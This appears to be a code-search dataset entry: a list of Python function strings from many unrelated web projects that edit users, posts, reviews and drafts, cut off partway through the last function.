user = g.user\n form = EditUserForm(obj=user)\n\n if form.validate_on_submit():\n if User.authenticate(user.username, form.password.data):\n user.username = form.username.data\n user.email = form.email.data\n user.location = form.location.data\n user.bio = form.bio.data\n user.image_url = form.image_url.data\n\n db.session.commit()\n return redirect(f\"/users/{user.id}\")\n\n flash(\"Invalid password, please try again\", 'danger')\n\n return render_template('/users/edit.html', form=form, user_id=user.id, user=user)", "def edit_entry(self, id, body=None, link=None, **args):\n args.update(id=id)\n if body: args.update(body=body)\n if link: args.update(link=link)\n return self.fetch(\"/entry\", post_args=args)", "def edit_show_user(user_id):\n edited_user = User.query.get_or_404(user_id)\n\n edited_user.first_name = request.form['first_name']\n edited_user.last_name = request.form['last_name']\n edited_user.image_url = request.form['image_url']\n\n db.session.add(edited_user)\n db.session.commit()\n\n return redirect('/')", "def show_edit_post_form(user_id, post_id):\n\n post = Post.query.get_or_404(post_id)\n user = post.user\n\n return render_template('edit_post.html', post=post, user=user)", "def edit(tesserae, tessera_id):\n try:\n return tesserae.edit(tessera_id)\n except TesseraError, e:\n sys.stderr.write(\"Error: %s\\n\", str(e))\n return False", "def do_delete_draft(draft_id: int, user_profile: UserProfile) -> None:\n try:\n draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)\n except Draft.DoesNotExist:\n raise ResourceNotFoundError(_(\"Draft does not exist\"))\n\n draft_id = draft_object.id\n draft_object.delete()\n\n event = {\"type\": \"drafts\", \"op\": \"remove\", \"draft_id\": draft_id}\n send_event(user_profile.realm, event, [user_profile.id])", "def update_user(self, user):\n query = TABELLE['id_users']['update']\n return self.execute(query,\n (user['admin'], user['tester'], user['loot_user'], user['loot_admin'], user['banned'],\n user['id']))", "def save_draft(self, review_request):\r\n self.api_call('api/review-requests/%s/draft/save/' %\r\n review_request['id'])\r\n self.debug('Review request draft saved')", "def process_post_edit(user_id, post_id):\n\n title = request.form.get('title')\n content = request.form.get('content')\n\n post = Post.query.get_or_404(post_id)\n\n post.title = title\n post.content = content\n\n db.session.add(post)\n db.session.commit()\n\n return redirect(f'/users/{user_id}/posts/{post_id}')", "def save_edit(request, post_id):\n if request.method == \"PUT\":\n data = json.loads(request.body)\n user = request.user\n post = Post.objects.get(id=post_id)\n content = data.get(\"content\", \"\")\n # Check to make sure user attempting edit is author\n if user == post.author:\n post.content = content\n post.save()\n return JsonResponse({\"content\": post.content})\n else:\n return JsonResponse({\"message\": \"Not authorized to edit\"})", "def edit_user(user_id):\n \"\"\"Cannot update a user's role\"\"\"\n db = get_db()\n users = db.users\n data = request.json\n \n # Check if user_id is a string\n if not isinstance(user_id, str):\n raise APIException(status_code=400, message='user_id not a string')\n \n # Check if user_id is actually an entry in the users collection\n cursor = users.find({\"user_id\": user_id})\n if cursor.count() is 0:\n raise APIException(status_code=404, message='user_id does not exist yet')\n elif cursor.count() > 1:\n raise APIException(status_code=500, message='Error, multiple entries with same user_id found. user_id must be unique')\n \n # Validate that the data matches the required format\n # user_id = data['user_id']\n # del data['user_id']\n validate_user_data(data, is_adding_new_user=False)\n # data['user_id'] = user_id\n\n result = users.update_one(\n {\"user_id\": user_id},\n {\n \"$set\": {\n \"name\": data[\"name\"],\n \"phone\": data[\"phone\"],\n \"email\": data[\"email\"],\n \"VenmoUsername\": data[\"VenmoUsername\"],\n \"gender\": data[\"gender\"],\n \"height\": data[\"height\"],\n \"weight\": data[\"weight\"],\n \"age\": data[\"age\"],\n \"bio\": data[\"bio\"],\n \"tags\": data[\"tags\"],\n \"location\": data[\"location\"],\n \"pic_url\": data[\"pic_url\"]\n }\n }\n )\n \n if \"role\" not in data:\n return '', 200\n if data[\"role\"] == \"Mentor\":\n result = users.update_one(\n {\"user_id\": user_id},\n {\n \"$set\": {\n \"rates\": data[\"rates\"],\n \"accepting_clients\": data[\"accepting_clients\"]\n }\n }\n )\n return '', 200", "def get_draft(draft_uuid):\n assert isinstance(draft_uuid, UUID)\n try:\n data = api_request('get', api_url('drafts', str(draft_uuid)))\n except NotFound:\n raise DraftNotFound(f\"Draft does not exist: {draft_uuid}\") # lint-amnesty, pylint: disable=raise-missing-from\n return _draft_from_response(data)", "def _edit_user(self):\n users = fileIO.load_json(\"users.json\")\n print(\"The list of users is as follows: \")\n for i in users:\n print(users[i][\"name\"])\n #List specific user's settings and get user id\n userID = self._list_user_settings(users)\n #Loop until valid option given\n option = False\n while not option:\n option = input(\"Please enter the setting you would like to change: \")\n if option not in users[userID]:\n option = False\n print(\"That setting is not valid.\")\n #Get input for new setting\n args = input(\"Please enter what you would like to change that setting to: \")\n #Output\n command = \"edit_user {0} {1} {2}\\r\\n\".format(userID, option, args)\n return(command)", "def edit_user(request, userid):\n if request.method == 'POST':\n form = UserDetailsForm(request.POST)\n if form.is_valid():\n # we're going to update the first_name, last_name, and email fields of this object\n user = request.user\n user.first_name = form.cleaned_data['first_name']\n user.last_name = form.cleaned_data['last_name']\n user.email = form.cleaned_data['email']\n user.save()\n return HttpResponseRedirect(reverse('view-profile', args=[userid]))\n else:\n form = UserDetailsForm(instance=request.user)\n\n return render(request, 'woofer/show_form.html', {\n 'form' : form,\n 'message' : None,\n 'form_action' : reverse('edit-user', args=[userid]),\n 'title' : \"Edit Account\"\n })", "def process_user_edit_form(user_id):\n first_name = request.form.get('first_name')\n last_name = request.form.get('last_name')\n image_url = request.form.get('image_url')\n\n # can add value in edit_user.html to remove this\n user = User.query.get_or_404(user_id)\n\n user.first_name = first_name\n user.last_name = last_name\n user.image_url = image_url\n\n db.session.add(user)\n db.session.commit()\n\n flash(f'Edited user info for: {first_name} {last_name}')\n\n return redirect('/users')", "def edit_user(request, user_id):\n profile = get_object_or_404(UserProfile, user=request.user)\n\n # make sure only managers and admins can add a team\n if profile.level == 'admin' or profile.level == 'manager':\n\n user = get_object_or_404(UserProfile, pk=user_id)\n if request.method == 'POST':\n form = UserProfileForm(request.POST, request.FILES, instance=user)\n if form.is_valid():\n form.save()\n messages.success(request, 'User edited successfully')\n\n users = UserProfile.objects.filter(company_id=profile.company_id)\n template = 'profiles/user_management.html'\n context = {\n 'users': users,\n 'profile': profile\n }\n return render(request, template, context)\n\n else:\n print(\"failed\")\n else:\n form = UserProfileForm(instance=user)\n\n template = 'profiles/profile.html'\n context = {\n 'form': form,\n 'profile': user,\n }\n\n return render(request, template, context)\n\n else:\n messages.info(request, \"Sorry, you are not authorized to edit users. Ask a Manager or Admin.\")\n\n return redirect(reverse('planning', ))", "def user_edit(request):\n\n if request.method != 'POST':\n return HttpResponseNotAllowed(['POST'])\n\n data = json.loads(request.body.decode('utf-8'))\n\n auth_token = str(data.get('auth_token', ''))\n edit_user_info = data.get('edit_user_info', '')\n username = str(edit_user_info.get('username', ''))\n\n try:\n if not verify_admin(auth_token):\n raise PlantalyticsAuthException(ADMIN_INVALID)\n\n message = (\n 'Attempting to edit info for user: {}.'\n ).format(username)\n logger.info(message)\n check_user_parameters(edit_user_info)\n cassy.edit_user(edit_user_info)\n message = (\n 'Successfully edited info for user: {}.'\n ).format(username)\n logger.info(message)\n body = {\n 'errors': {}\n }\n return HttpResponse(\n json.dumps(body),\n content_type='application/json'\n )\n except PlantalyticsException as e:\n message = (\n 'Error attempting to edit user info. Error code: {}'\n ).format(str(e))\n logger.warn(message)\n error = custom_error(str(e))\n return HttpResponseForbidden(error, content_type='application/json')\n except Exception as e:\n message = (\n 'Unknown error occurred while attempting to edit user info:'\n )\n logger.exception(message)\n error = custom_error(UNKNOWN, str(e))\n return HttpResponseServerError(error, content_type='application/json')", "def edit_restaurant(restaurant_id):\n user_id = login_session['user_id']\n r = read_restaurants(restaurant_id, user_id)\n if r[1] is True: # Means if user is owner\n if request.method == 'GET':\n return render_template('restaurants/editrestaurant.html',\n restaurant=r[0][0])\n elif request.method == 'POST':\n # Got post request -> First we get the request arguemnts\n name = request.form['name']\n address = request.form['address']\n city = request.form['city']\n state = request.form['state']\n zipCode = request.form['zipCode']\n # Next we do the db edit\n update_restaurant(restaurant_id, name, address,\n city, state, zipCode)\n # Finally we return the success html\n flash(\"Edited your restaurant\")\n return render_template(\"submitted.html\")\n else:\n return \"Invalid http\"\n else:\n flash(\"You need to be the owner of the restaurant to edit\")\n return redirect(url_for('site.show_restaurants',\n restaurant_id=restaurant_id))", "def patch(self, user_id):\n\n data = request.get_json()\n\n res = self._user.update_user(user_id, data)\n\n if res:\n return {\n \"status\": 200,\n \"data\": [{\n \"id\": res[\"id\"],\n \"message\": \"user record has been updated\"\n }]\n }, 200\n else:\n return {\n \"status\": 404,\n \"error\": \"Not found for id {}\".format(user_id)\n }, 404", "def view_user_edit(self):\n\n logged_in = authenticated_userid(self.request)\n message = ''\n form = Form(self.request, schema=UserEditSchema,\n state=State(request=self.request))\n if form.validate():\n password = self.request.params['password']\n if self.context.validate_password(password):\n if self.request.params['new_password']:\n password = self.request.params['new_password']\n message = 'Successfully saved'\n email = self.request.params['email']\n self.context.edit(password, email)\n else:\n message = msg['password_invalid']\n return {\n 'message': message,\n 'project': '',\n 'username': self.context.username,\n 'logged_in': logged_in,\n 'form': FormRenderer(form),\n 'email': self.context.email\n }", "def update_draft(self, identity, data=None, record=None, **kwargs):\n record.metadata = data.get('metadata', {})", "def edit_widget():\n\n user_id = session.get('user_id')\n user_email = session.get('user_email')\n\n user = db_users.find_by_email(user_email)\n\n if user is None:\n log.error('widget.py::edit_widget', 'ERROR: invalid state - no user record for user_email: ' + user_email)\n flash('Please sign in. If you are not already a user, please sign up.')\n return redirect(url_for('home.index'))\n\n widget_id = request.args.get('widget_id')\n\n if widget_id is None:\n\n log.error('widget.py::edit_widget',\n 'ERROR: invalid state - no widget_id in request. user_id [' + user_id + ']')\n\n flash('Oops! Something went sideways. We have been notified of the problem. Carry on.')\n return redirect(url_for('widget.my_widgets'))\n\n log.debug('widget.py::edit_widget', 'widget_id [' + widget_id + ']')\n\n widget_to_edit: Optional[Dict[Any, Any]] = db_widgets.find_by_id(widget_id)\n\n if widget_to_edit is None:\n\n log.error('widget.py::edit_widget',\n 'ERROR: invalid state - no widget record for widget_id [' + widget_id + ']')\n\n flash('Oops! Something went sideways. We have been notified of the problem. Carry on.')\n return redirect(url_for('widget.my_widgets'))\n\n return render_template('edit_widget.html', widget=widget_to_edit)", "def review_modify_handler(review_id, user):\n def fetch_params():\n text = Parser.string('json', 'text', min=25, max=2500)\n return text\n review = Review.query.get_or_404(str(review_id))\n if review.is_archived is True:\n raise NotFound\n if review.user_id != user.id:\n raise AccessDenied\n text = fetch_params()\n review.update(text=text)\n return jsonify(message='Request processed successfully',\n review=dict(id=review.id))", "def edit_review(review_id):\n form = EditReviewForm()\n try:\n review = Review.from_mongo(**mongo.db.reviews.find_one({\"_id\": ObjectId(review_id)}))\n except Exception as e:\n raise Exception(e)\n else:\n game = Game.from_mongo(**mongo.db.games.find_one({\"_id\": ObjectId(str(review.game_id))}))\n user_name = session.get('username')\n if user_name == review.author_ref['author_name']:\n user = User.from_mongo(**mongo.db.users.find_one({\"name\": user_name}))\n\n if form.validate_on_submit():\n review.name = form.title.data\n review.text = form.review_text.data\n review_ref = review.create_review_ref()\n review.update_review()\n for game_review in game.reviews:\n if game_review.get('review_pub_date') == review.pub_date:\n game.reviews.remove(game_review)\n game.reviews.append(review_ref)\n game.update_game()\n for user_review in user.reviews:\n if user_review.get('review_pub_date') == review.pub_date:\n user.reviews.remove(user_review)\n user.reviews.append(review_ref)\n user.update_user()\n return redirect(url_for('review', review_id=review_id))\n\n elif request.method == \"GET\":\n form.title.data = review.name\n form.review_text.data = review.text\n\n return render_template('edit_review.html.jinja',\n title='Edit Review',\n review_id=review_id,\n form=form\n )", "def update_user(user_id):\n netAdminToolDB = app.config['DATABASE']\n user = netAdminToolDB.get_user(user_id)\n if user == None:\n return jsonify({'error': 'User_id not found'}), 404\n\n input = request.get_json()\n\n if input == None:\n return jsonfiy({'error': 'Invalid PUT request'}), 400\n\n # Send input directly to update_user function, which checks each key\n netAdminToolDB.update_user(user_id, **input)\n user = netAdminToolDB.get_user(user_id)\n userDict = dict(user)\n uri = url_for('get_user', user_id=user.id, _external=True)\n userDict['uri'] = uri\n\n return jsonify({'user': userDict}), 200", "def update_user_data(payload, user_id):\n user = User.query.get(user_id)\n # exception for non existing id\n if user is None:\n abort(404)\n # set error status\n error = False\n # get posted data from json request\n body = request.get_json()\n # update user data\n keys = body.keys()\n try:\n if 'e_mail' in keys:\n user.e_mail = body['e_mail']\n if 'address' in keys:\n user.address = body['address']\n if 'auth0_id' in keys:\n user.auth0_id = body['auth0_id']\n if 'role' in keys:\n user.role = body['role']\n user.update()\n formatted_user = user.format()\n except Exception:\n user.rollback()\n error = True\n print(sys.exc_info())\n finally:\n user.close_session()\n\n if error:\n abort(422)\n\n return jsonify({\n 'success': True,\n 'user': formatted_user\n })", "def edit_board(action, user):\n userprofile = user.get_profile()\n \n try:\n board = userprofile.get_board(action['boardId'])\n editable_attributes = ('title', )\n \n for key, value in action['what'].iteritems():\n if key == 'id': continue\n elif key in editable_attributes:\n board.__setattr__(key, value)\n \n userprofile.save()\n except Board.DoesNotExist:\n return", "def user_can_edit(self, user):\n return user == self.owner", "def get(self, oauth, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n return d.type.marshal_draft(d.get_draft(draft_id))", "def fusion_api_edit_user(self, body, uri, api=None, headers=None):\n return self.user.update(body, uri, api, headers)", "def _inline_draft(request):\n # TODO(guido): turn asserts marked with XXX into errors\n # Don't use @login_required, since the JS doesn't understand redirects.\n if not request.user:\n # Don't log this, spammers have started abusing this.\n return HttpTextResponse('Not logged in')\n snapshot = request.POST.get('snapshot')\n assert snapshot in ('old', 'new'), repr(snapshot)\n left = (snapshot == 'old')\n side = request.POST.get('side')\n assert side in ('a', 'b'), repr(side) # Display left (a) or right (b)\n issue_id = int(request.POST['issue'])\n issue = models.Issue.get_by_id(issue_id)\n assert issue # XXX\n patchset_id = int(request.POST.get('patchset') or\n request.POST[side == 'a' and 'ps_left' or 'ps_right'])\n patchset = models.PatchSet.get_by_id(int(patchset_id), parent=issue.key)\n assert patchset # XXX\n patch_id = int(request.POST.get('patch') or\n request.POST[side == 'a' and 'patch_left' or 'patch_right'])\n patch = models.Patch.get_by_id(int(patch_id), parent=patchset.key)\n assert patch # XXX\n text = request.POST.get('text')\n lineno = int(request.POST['lineno'])\n message_id = request.POST.get('message_id')\n comment = _add_or_update_comment(user=request.user, issue=issue, patch=patch,\n lineno=lineno, left=left,\n text=text, message_id=message_id)\n issue.calculate_draft_count_by_user()\n issue_fut = issue.put_async()\n\n query = models.Comment.query(\n models.Comment.patch_key == patch.key, models.Comment.lineno == lineno,\n models.Comment.left == left).order(models.Comment.date)\n comments = list(c for c in query if not c.draft or c.author == request.user)\n if comment is not None and comment.author is None:\n # Show anonymous draft even though we don't save it\n comments.append(comment)\n issue_fut.get_result()\n if not comments:\n return HttpTextResponse(' ')\n for c in comments:\n c.complete()\n return render_to_response('inline_comment.html',\n {'user': request.user,\n 'patch': patch,\n 'patchset': patchset,\n 'issue': issue,\n 'comments': comments,\n 'lineno': lineno,\n 'snapshot': snapshot,\n 'side': side,\n },\n context_instance=RequestContext(request))", "def edit_user_profile(user_id):\n if CURRENT_USER_KEY not in session or session[CURRENT_USER_KEY] != user_id:\n raise Unauthorized()\n\n user = User.query.get_or_404(user_id)\n\n form = UserEditForm(obj=user)\n\n if form.validate_on_submit():\n try:\n user.email = form.email.data\n user.username = form.username.data\n user.first_name = form.first_name.data.capitalize()\n user.last_name = form.last_name.data.capitalize()\n user.image_url = form.image_url.data or User.image_url.default.arg\n user.cover_url = form.cover_url.data or User.cover_url.default.arg\n user.bio = form.bio.data\n\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n flash(\n \"Email or Username already taken!! Please try again\", 'danger')\n return render_template('edit_profile.html', form=form, user=user, img_src=user.image_url)\n\n flash('Profile Successfully Updated!', 'success')\n return redirect(url_for('show_user_profile', user_id=user.id))\n return render_template('edit_profile.html', form=form, user=user, img_src=user.image_url)", "def editSport(sport_id):\n\n editedSport = session.query(Sport).filter_by(id=sport_id).one()\n if request.method == 'POST':\n if request.form['sportName']:\n editedSport.sportName = request.form['sportName']\n editedSport.user_id = login_session['user_id']\n session.add(editedSport)\n session.commit()\n return redirect(url_for('showSports'))\n else:\n return render_template('editsport.html', sport=editedSport)", "def can_user_edit(self, user):\n\n return user.is_authenticated and (\n user.has_role('admin') or\n unicode(self.user_id) == user.get_id()\n )", "def put(self, user, recipe_id):\n data = request.json\n return update_recipe(data=data, user=user, recipe_id=recipe_id)", "def update_item(self, id: str, user: User, **kwargs) -> None:", "def internal_edit_user(\n payload: dict,\n raiseonfail: bool = False,\n override_authdb_path: str = None,\n config: SimpleNamespace = None,\n) -> dict:\n\n engine, meta, permjson, dbpath = get_procdb_permjson(\n override_authdb_path=override_authdb_path,\n override_permissions_json=None,\n raiseonfail=raiseonfail,\n )\n\n for key in (\"reqid\", \"pii_salt\"):\n if key not in payload:\n LOGGER.error(\n \"Missing %s in payload dict. Can't process this request.\" % key\n )\n return {\n \"failure_reason\": (\n \"invalid request: missing '%s' in request\" % key\n ),\n \"success\": False,\n \"session_token\": None,\n \"expires\": None,\n \"messages\": [\"Invalid edit-user request.\"],\n }\n\n for key in (\"target_userid\", \"update_dict\"):\n\n if key not in payload:\n\n LOGGER.error(\n \"[%s] Invalid session edit-user request, missing %s.\"\n % (payload[\"reqid\"], key)\n )\n\n return {\n \"success\": False,\n \"failure_reason\": (\n \"invalid request: missing '%s' in request\" % key\n ),\n \"messages\": [\n \"Invalid edit-user request: \"\n \"missing or invalid parameters.\"\n ],\n }\n\n target_userid = payload[\"target_userid\"]\n update_dict = payload[\"update_dict\"]\n if update_dict is None or len(update_dict) == 0:\n return {\n \"success\": False,\n \"failure_reason\": (\n \"invalid request: missing 'update_dict' in request\"\n ),\n \"messages\": [\n \"Invalid user-edit request: \" \"missing or invalid parameters.\"\n ],\n }\n\n update_dict_keys = set(update_dict.keys())\n disallowed_keys = {\n \"user_id\",\n \"system_id\",\n \"password\",\n \"emailverify_sent_datetime\",\n \"emailforgotpass_sent_datetime\",\n \"emailchangepass_sent_datetime\",\n \"last_login_success\",\n \"last_login_try\",\n \"failed_login_tries\",\n \"created_on\",\n \"last_updated\",\n }\n leftover_keys = update_dict_keys.intersection(disallowed_keys)\n\n if len(leftover_keys) > 0:\n LOGGER.error(\n \"[%s] Invalid edit-user request, \"\n \"found disallowed update keys in update_dict: %s.\"\n % (payload[\"reqid\"], leftover_keys)\n )\n return {\n \"success\": False,\n \"failure_reason\": (\n \"invalid request: disallowed keys in update_dict: %s\"\n % leftover_keys\n ),\n \"messages\": [\n \"Invalid edit-user request: \" \"invalid update parameters.\"\n ],\n }\n\n #\n # now, try to update\n #\n try:\n\n users = meta.tables[\"users\"]\n\n sel = (\n select(users.c.user_id, users.c.extra_info)\n .select_from(users)\n .where(users.c.user_id == target_userid)\n )\n\n with engine.begin() as conn:\n result = conn.execute(sel)\n userid_and_extrainfo = result.first()\n\n if not userid_and_extrainfo or len(userid_and_extrainfo) == 0:\n return {\n \"success\": False,\n \"failure_reason\": \"no such user\",\n \"messages\": [\"User info update failed.\"],\n }\n\n if (\n \"extra_info\" in update_dict\n and update_dict[\"extra_info\"] is not None\n ):\n\n user_extra_info = userid_and_extrainfo.extra_info\n if not user_extra_info:\n user_extra_info = {}\n\n for key, val in update_dict[\"extra_info\"].items():\n if val == \"__delete__\" and key in user_extra_info:\n del user_extra_info[key]\n else:\n user_extra_info[key] = val\n\n else:\n user_extra_info = userid_and_extrainfo.extra_info\n\n # do the update\n\n # replace the extra_info key in the update_dict since we update that\n # separately\n update_dict[\"extra_info\"] = user_extra_info\n\n with engine.begin() as conn:\n upd = (\n users.update()\n .where(\n users.c.user_id == target_userid,\n )\n .values(update_dict)\n )\n conn.execute(upd)\n\n s = (\n select(*user_info_columns(users))\n .select_from(users)\n .where(users.c.user_id == target_userid)\n )\n\n result = conn.execute(s)\n row = result.first()\n\n try:\n\n serialized_result = dict(row._mapping)\n LOGGER.info(\n \"[%s] User info updated for \"\n \"user_id: %s.\"\n % (\n payload[\"reqid\"],\n pii_hash(\n serialized_result[\"user_id\"], payload[\"pii_salt\"]\n ),\n )\n )\n\n return {\n \"success\": True,\n \"user_info\": serialized_result,\n \"messages\": [\"User-info update successful.\"],\n }\n\n except Exception as e:\n\n LOGGER.error(\n \"[%s] User info update failed for session token: %s. \"\n \"Exception was: %r.\"\n % (\n payload[\"reqid\"],\n pii_hash(payload[\"target_userid\"], payload[\"pii_salt\"]),\n e,\n )\n )\n\n return {\n \"success\": False,\n \"failure_reason\": \"user requested for update doesn't exist\",\n \"messages\": [\"User info update failed.\"],\n }\n\n except Exception as e:\n\n LOGGER.error(\n \"[%s] User info update failed for user_id: %s. \"\n \"Exception was: %r.\"\n % (\n payload[\"reqid\"],\n pii_hash(payload[\"target_userid\"], payload[\"pii_salt\"]),\n e,\n )\n )\n\n return {\n \"success\": False,\n \"failure_reason\": \"DB error when updating user info\",\n \"messages\": [\"User info update failed.\"],\n }", "def test_save_draft():\n with open(basedir + \"fixture/7149593_formatted.json\", \"r\") as f:\n storage.save_draft(user_id, \"bib\", \"7149593\", f.read(), \"1362044230872\")\n with open(basedir + \"some/path/\" + user_id + \"/bib/7149593\", \"r\") as f:\n json_data = json.loads(f.read())\n assert json_data['document']['@id'].rsplit(\"/\",1)[1] == '7149593'\n assert json_data['etag'] == \"1362044230872\"", "def can_be_edited(self, user):\n return (self.is_public or user == self.owner or\n user in list(self.auth_users.all()))", "def update_draft(self, kav_id, html):\n kav_api = getattr(self.api, settings.SALESFORCE_ARTICLE_TYPE)\n data = html.create_article_data()\n result = kav_api.update(kav_id, data)\n if result != HTTPStatus.NO_CONTENT:\n raise SalesforceError((\n 'Error updating draft KnowledgeArticleVersion (ID={})'\n ).format(kav_id))\n return result", "def edit_user(user_id):\n if request.method == 'GET':\n # init form with current user:\n form = ProfileForm(\n nickname = session[Session.PROFILE][\"nickname\"], \n location = session[Session.PROFILE][\"location\"],\n about_me = session[Session.PROFILE][\"about_me\"]\n )\n if request.method == 'POST': \n # init form with POSTed form:\n form = ProfileForm(request.form)\n\n if form.validate(): \n # update backend:\n response = service_user_management.patch(\n id = f'auth0|{user_id}', \n nickname = form.nickname.data, \n location = form.location.data,\n about_me = form.about_me.data\n )\n\n # success:\n if 'identities' in response: \n try:\n # update db:\n delegated_user = DelegatedUser.query.get_or_404(\n user_id, \n description='There is no user with id={}'.format(user_id)\n )\n delegated_user.nickname = form.nickname.data\n # update:\n db.session.add(delegated_user)\n # write\n db.session.commit()\n\n # update session:\n session[Session.PROFILE][\"nickname\"] = form.nickname.data\n session[Session.PROFILE][\"location\"] = form.location.data\n session[Session.PROFILE][\"about_me\"] = form.about_me.data\n \n # on successful profile update, flash success\n flash('Your profile was successfully updated.')\n\n return redirect(url_for('.show_user', user_id = user_id))\n except:\n db.session.rollback()\n # on unsuccessful registration, flash an error instead.\n flash('An error occurred. New account could not be created.')\n finally:\n db.session.close()\n # failure:\n else:\n flash(response['message']) \n else:\n # for debugging only:\n flash(form.errors)\n \n return render_template('users/forms/user.html', form=form, user_id=user_id)", "def draft_message(request):\n query = models.Message.query(\n models.Message.issue_key == request.issue.key,\n models.Message.sender == request.user.email(),\n models.Message.draft == True)\n if query.count() == 0:\n draft_message = None\n else:\n draft_message = query.get()\n if request.method == 'GET':\n return _get_draft_message(draft_message)\n elif request.method == 'POST':\n return _post_draft_message(request, draft_message)\n elif request.method == 'DELETE':\n return _delete_draft_message(draft_message)\n return HttpTextResponse('An error occurred.', status=500)", "def user_edit(user_id):\n\n if not g.user:\n return _get_json_message(\n INVALID_CREDENTIALS_MSG,\n INVALID_CREDENTIALS_STATUS_CODE)\n\n current_user = User.query.get_or_404(user_id)\n received = request.form\n file = request.files.get(\"image_url\")\n form = UserEditForm(csrf_enabled=False, data=received)\n\n if form.validate_on_submit():\n if not User.authenticate(g.user.username, form.password.data):\n return _get_json_message(\n \"unable-to-update-user\",\n INVALID_CREDENTIALS_STATUS_CODE)\n\n try:\n # update non image_url fields\n current_user.email = form.email.data\n current_user.first_name = form.first_name.data,\n current_user.last_name = form.last_name.data,\n current_user.hobbies = form.hobbies.data,\n current_user.interests = form.interests.data,\n current_user.zip_code = form.zip_code.data,\n current_user.friend_radius_miles = form.friend_radius_miles.data\n\n current_user.coordinates = User.get_coords(form.zip_code.data)\n\n # update image_url with uploaded file\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n url = upload_file_obj(file, S3_BUCKET, filename)\n\n current_user.image_url = url\n\n db.session.commit()\n\n return jsonify(user=current_user.serialize())\n except ClientError as e:\n print(e)\n return _get_json_message(\n \"image-upload-failed\",\n INVALID_CREDENTIALS_STATUS_CODE)\n\n return _get_json_message(\n \"unable-to-update-user\",\n INVALID_CREDENTIALS_STATUS_CODE)", "def edit(id):\n r = requests.get(API_ROUTE + '/' + str(id), headers={'Auth': _auth()})\n if r.status_code != requests.codes.ok:\n return r.text, r.status_code\n\n return render_template('editor.html', article=r.json())", "def update_review(review_id):\n user_input = request.get_json()\n if user_input is None:\n abort(400, {'message': 'Not a JSON'})\n obj = storage.get(Review, review_id)\n if obj is None:\n abort(404)\n for k, v in user_input.items():\n if k not in ['id', 'user_id', 'place_id',\n 'created_at', 'updated_at']:\n setattr(obj, k, v)\n obj.save()\n return jsonify(obj.to_dict()), 200", "def test_create_draft_with_update(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'metadata': {'due': '2077-10-10T04:00Z'},\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n published = self.get_item_from_modulestore(self.problem_usage_key, False)\r\n self.assertIsNone(published.due)\r\n draft = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertEqual(draft.due, datetime(2077, 10, 10, 4, 0, tzinfo=UTC))", "def edit_user():\n userid = request.form[\"userid\"]\n email = request.form[\"email\"]\n fname = request.form[\"fname\"]\n lname = request.form[\"lname\"]\n macaddress = request.form[\"macaddress\"]\n role = request.form[\"role\"]\n\n print(userid, \" | \",email,\" | \", fname,\" | \", lname, \" | \",macaddress,\" | \", role)\n\n user = User.query.get(userid)\n user.email = email\n user.fname = fname\n user.lname = lname\n user.macaddress = macaddress\n user.role = role\n\n # commit the new add.\n db.session.commit()\n\n return userSchema.jsonify(user)", "def blogEdit(request, urlname):\n\tblog = Blog.objects.get(authors=request.user, urlname=urlname)\n\tsections = [(s.pk, s.name) for s in blog.blogsection_set.all()]\n\teditor = request.user in blog.editors.all()\n\tif request.method == 'POST':\n\t\tform = BlogForm(request.POST, sections=sections)\n\t\tif form.is_valid():\n\t\t\tdata = form.cleaned_data\n\t\t\tif data['urlname']:\n\t\t\t\tpost = BlogEntry.qa_objects.get(blog=blog, urlname=data['urlname'])\n\t\t\t\tpost.title = data['title']\n\t\t\t\tpost.byline = data['byline']\n\t\t\t\tpost.byline_link = data['byline_link']\n\t\t\t\tpost.reviewed_by = data['reviewed_by']\n\t\t\t\tpost.reviewed_by_link = data['reviewed_by_link']\n\t\t\t\tpost.body = data['body']\n\t\t\t\tfor section in data['sections']:\n\t\t\t\t\tsection_model = BlogSection.objects.get(pk=section)\n\t\t\t\t\texisting = BlogEntrySection.qa_objects.filter(entry=post, section=section_model)\n\t\t\t\t\tif not existing:\n\t\t\t\t\t\tnew = BlogEntrySection(entry=post, section=section_model)\n\t\t\t\t\t\tpost.blogentrysection_set.add(new)\n\t\t\telse:\n\t\t\t\tpost = BlogEntry(for_update=2, blog=blog, urlname=None, author=request.user, title=data['title'], posting_time=data['posting_time'], display_time=data['display_time'], byline=data['byline'], byline_link=data['byline_link'], reviewed_by=data['reviewed_by'], reviewed_by_link=data['reviewed_by_link'], body=data['body'])\n\t\t\tpost.save()\n\t\t\treturn render_to_response('blogs/admin/blog_admin.html', {'user': request.user, 'editor': editor, 'blog': blog}, context_instance=RequestContext(request))\n\t\telse:\n\t\t\treturn render_to_response('blogs/admin/blog_edit.html', {'form': form, 'user': request.user, 'editor': editor, 'blog': blog}, context_instance=RequestContext(request))\n\telse:\n\t\tif request.GET.get('entry'):\n\t\t\tentry = request.GET['entry']\n\t\t\tpost = BlogEntry.qa_objects.get(blog=blog, urlname=entry)\n\t\t\tinitial_sections = [s.pk for s in post.blogentrysection_set.all()]\n\t\t\tform = BlogForm(sections=sections, initial={'posting_time': post.posting_time, 'display_time': post.display_time, 'urlname': entry, 'title': post.title, 'byline': post.byline, 'byline_link': post.byline_link, 'reviewed_by': post.reviewed_by, 'reviewed_by_link': post.reviewed_by_link, 'body': post.body, 'sections': initial_sections})\n\t\telse:\n\t\t\tform = BlogForm(sections=sections)\n\t\treturn render_to_response('blogs/admin/blog_edit.html', {'form': form, 'user': request.user, 'editor': editor, 'blog': blog}, context_instance=RequestContext(request))", "def get(self,\n draft_id,\n ):\n return self._invoke('get',\n {\n 'draft_id': draft_id,\n })", "def update(self, user_id, first_name=None, last_name=None, email=None, title=None,\n dept=None, notes=None, admin_role=None, app_role=None, email_notification=None):\n\n url = \"{0}/users/{1}\".format(self.base_url, user_id)\n url = self._add_token_to_url(url)\n payload = self.get(user_id)\n\n # get rid of fields that aren't required for PUT\n pop_fields = ['complete_json',\n 'entity_type',\n 'id',\n 'image',\n 'is_deleted',\n 'tags',\n 'username']\n for field in pop_fields:\n payload.pop(field)\n\n # replace fields with updated ones from kwargs\n if first_name:\n 